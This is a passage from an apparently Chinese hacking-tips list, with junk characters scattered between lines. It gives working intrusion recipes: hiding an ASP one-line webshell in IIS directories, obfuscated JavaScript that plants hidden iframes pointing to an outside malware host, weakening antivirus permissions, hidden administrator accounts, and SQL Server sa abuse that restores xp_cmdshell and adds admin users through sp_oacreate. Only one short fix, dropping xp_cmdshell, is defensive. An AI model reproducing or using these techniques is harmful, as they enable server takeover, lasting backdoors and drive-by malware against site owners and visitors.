执行后可以用AT命令查看新加的任务7 `5 f( k, n2 @0 T; U
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。3 J( N0 n3 p, H: s8 Y- ^& k7 O# S3 o
6 d) V4 T$ G, E6 p4 {9 r
53、隐藏ASP后门的两种方法
, K ~ L. z! N7 l3 ~1、建立非标准目录:mkdir images..\
2 E/ O. ?( q; y$ s* u: p拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp4 K2 q) R) y) r0 O" \- I
通过web访问ASP木马:http://ip/images../news.asp?action=login! S/ N' a: w6 Y
如何删除非标准目录:rmdir images..\ /s+ G( _/ A) X6 t0 k5 L* h, U) `$ z
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:7 N- K/ U6 M' c0 y: n& R
mkdir programme.asp
0 E, R! J6 T# Q( G Y; U2 b新建1.txt文件内容:<!--#include file=”12.jpg”-->/ n- ]+ ?& k1 V" W
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
" k2 `9 x9 F: F) s* ]attrib +H +S programme.asp) }, U8 ?; z) U7 U) g8 m$ y( x
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
) l) k! s) C5 A# b: `: d2 e4 b3 M1 h* e1 N
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
/ {2 y; q( k" J! [0 k* T然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。" w$ p6 p7 q0 K1 P9 b# h
: }+ Y8 @) D H0 h+ ` _55、JS隐蔽挂马, G; I; H# Y* ?# C# T$ p
1.
* Y5 r5 x5 q4 l! ~- Wvar tr4c3="<iframe src=ht";
# G, x" W Q) V- [& ttr4c3 = tr4c3+"tp:/";
2 H0 L3 `6 Q+ V( K; q, }' Vtr4c3 = tr4c3+"/ww";' n& ~! j% q2 J5 l/ N# f
tr4c3 = tr4c3+"w.tr4";& \: F- l) i Y, w& u' N- g. ^: L
tr4c3 = tr4c3+"c3.com/inc/m";
- ]/ G' s5 u. g, S* j! Y; Itr4c3 = tr4c3+"m.htm style="display:none"></i";
8 V \7 [7 [# @tr4c3 =tr4c3+"frame>'";9 P/ a& t0 r5 s4 ~
document.write(tr4c3);
+ A! [6 p$ ~' q% W避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。6 z# s1 S9 B0 P7 i9 P! _
. z/ S0 c8 Q3 u3 j5 v6 k
2.
. K! j2 b: Y0 J4 x2 e转换进制,然后用EVAL执行。如
- b3 u2 N& w. ` H5 meval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");& {4 W% D0 {3 d/ q' `. r
不过这个有点显眼。
) |5 `0 s/ g! R& {' I9 M- J% k3./ ^) L2 a# L& ~" I1 |) S
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
! O9 v& ?7 K( k5 ?; j$ `* o$ O7 {最后一点,别忘了把文件的时间也修改下。
$ |) c* |+ n# y* w/ _, S% y' a. G5 X; O( g. L
56.3389终端入侵常用DOS命令
. B% [1 `9 R k1 l2 q9 L7 Ctaskkill taskkill /PID 1248 /t3 S/ T8 e# W% Y9 P6 A$ p
7 V- O: |) A: R; K' dtasklist 查进程
f% a# y4 v$ w1 B
! ~* G5 d" ~+ wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
2 H" Q1 u6 B, _/ Jiisreset /reboot
8 J6 U- y* v# \tsshutdn /reboot /delay:1 重起服务器
9 _3 I, R0 t" c$ |9 k% u @* Z
+ `, V8 C! p, I blogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,! V0 r3 _' U5 Q5 w% ~7 j6 E3 g8 s& U
! H F. F, u. c8 S4 @2 bquery user 查看当前终端用户在线情况7 Z1 F9 ?& @6 M% Q1 r6 Y) h) a0 C
1 d/ s& a) @, o& I要显示有关所有会话使用的进程的信息,请键入:query process */ l" \9 M" U3 u7 }: P1 A% k
% @! a& g) J: m' k7 g6 l
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:21 j8 W+ M P6 B1 i; G2 X
$ ~/ w3 o1 Z) J# b$ l) U要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2, s! F2 E& V( Q m0 Z3 D
( j7 {5 K0 I# S! K3 T8 Y要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02' C# d% b3 U& I* g: V9 d6 L
2 ?" G2 @: j" x2 m. M命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
1 Q5 }9 |" ], `6 d
6 L3 ?& n/ e9 c& j( o& e+ h3 d9 W6 d命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统$ L e7 y0 f) _+ c
& D: d7 S! a' k! U1 }命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。4 P; q. {5 B) f! X, Q2 A/ A# G) u2 @
6 q5 q# v; B" m2 b
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
0 q0 o, B3 Z# R, M# D# f7 E# l, w& d
56、在地址栏或按Ctrl+O,输入:
+ \9 u ?% H- l+ kjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
$ k' X, g9 m& o2 {% ]$ U& r8 _9 }# T" o9 `; {; b( E
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
2 z9 S4 N" o3 C) J# u$ u* {& A0 f1 j
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,) J3 i! x% O% P* X
用net localgroup administrators是可以看到管理组下,加了$的用户的。0 j. i5 ?' z G
1 m+ u' F$ ~* G. ]
58、 sa弱口令相关命令
& l" i: m" k! F/ D8 k) h2 e3 L0 q" u' S! T: |, ?6 y1 b1 d( ^. H
一.更改sa口令方法:5 W, O7 Z3 o W7 V9 ?
用sql综合利用工具连接后,执行命令:
$ s U8 d7 j1 G& k# w5 kexec sp_password NULL,'20001001','sa'
; j+ z: l, y1 i3 F(提示:慎用!)2 r' T1 k' i# z; r" |6 }
7 Z2 J# Z/ m @* z$ U- D' ?二.简单修补sa弱口令.
4 s# ^) ~ f3 X9 f, X2 u( `( w* M- t: |5 r2 g# u5 D
方法1:查询分离器连接后执行:( {* H* ~+ d! K7 y: P
if exists (select * from
e5 h! y! J5 h- j" ddbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and" ] y& \+ w6 S7 E
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)5 X0 g0 j- m1 F8 I8 U
+ t- X- y: y) e% k, P# c, Y5 kexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
5 W" w# D5 H/ p+ H# B" N3 S! u& o9 r0 v8 I! I# {5 o
GO8 h) w: l, D6 N6 d8 M) Z
+ }% o9 s# c$ A# _# F/ V! a7 r
然后按F5键命令执行完毕7 U1 g* w8 u# g5 M8 _5 o y
- X0 |3 O" ^ y# e, r
方法2:查询分离器连接后
' ~* j6 a/ Q, J: ]第一步执行:use master
$ g' D. ~) y7 i$ o f8 Q1 z0 e第二步执行:sp_dropextendedproc 'xp_cmdshell'
; @' H" f7 k6 ^4 a然后按F5键命令执行完毕/ R1 C' d3 n' l5 @- M9 w: S$ C* i- J
5 ^5 M- t" a1 P7 J; s E, w0 d
3 O; u0 N0 e7 W: c/ ~+ f三.常见情况恢复执行xp_cmdshell.
, s0 d6 o3 j' \# w* h" |, e
8 a' |$ N' B3 }' F; N6 ]& p8 [# r/ h# @3 R( C: p( p/ \& n
1 未能找到存储过程'master..xpcmdshell'." \; f( \+ {1 U6 x5 C8 `' G" A0 F" F0 Q
恢复方法:查询分离器连接后,$ M' ~2 S: M( b3 T
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
! z* B5 Z7 J3 k第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'5 i: r# T5 L8 r
然后按F5键命令执行完毕
3 |2 Q: ]! h& c- U" ^7 {* H
; n0 t6 l% R, n, j/ c0 T& L2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
, O2 L3 p, P* \, o$ i) o7 u/ n恢复方法:查询分离器连接后,
! u! w) i6 c$ ~$ o; o L2 h( ?# q第一步执行:sp_dropextendedproc "xp_cmdshell"! g6 u4 x/ }4 N4 Z& f: L
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ C9 X4 ?3 K* }然后按F5键命令执行完毕
2 L' E) P# j9 Y$ b0 x
2 x% P! ^3 u7 l( P" q( m2 \3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
4 _; A6 ]' \# Z1 [, G恢复方法:查询分离器连接后,0 P% k7 A& c, s
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
) N3 a, W! V9 Q S第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
# `8 l$ |2 L) V* q3 m( x" `: l然后按F5键命令执行完毕) r$ X" m. f- s. |( N( s
$ o6 B$ j8 F+ v7 j2 W! H
四.终极方法.
) b+ T/ \ Q9 _+ e0 j% }& e如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
9 k+ |: I+ k7 A, j$ v- v- A) ]查询分离器连接后,9 @1 Q/ ^ c9 w- w4 q7 ~
2000servser系统:
) [; B' a# d" N. ]1 G8 z5 f% N: Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'2 |3 y4 Q: M* {& D+ u
3 \: [ A2 {8 Z% ~, S0 ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
: ?: F1 g6 w* Y; i
1 X- V; v" W. u J/ ?# J$ h7 ]; jxp或2003server系统:3 p1 s% v A+ @. Z. C" c! r
4 C7 T( u7 A2 P$ A$ i5 |: s+ ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'9 @7 b/ Y4 T" k/ ~
( c' e6 L8 U) z2 zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'" S! J z& o# @4 W; g! a+ l
|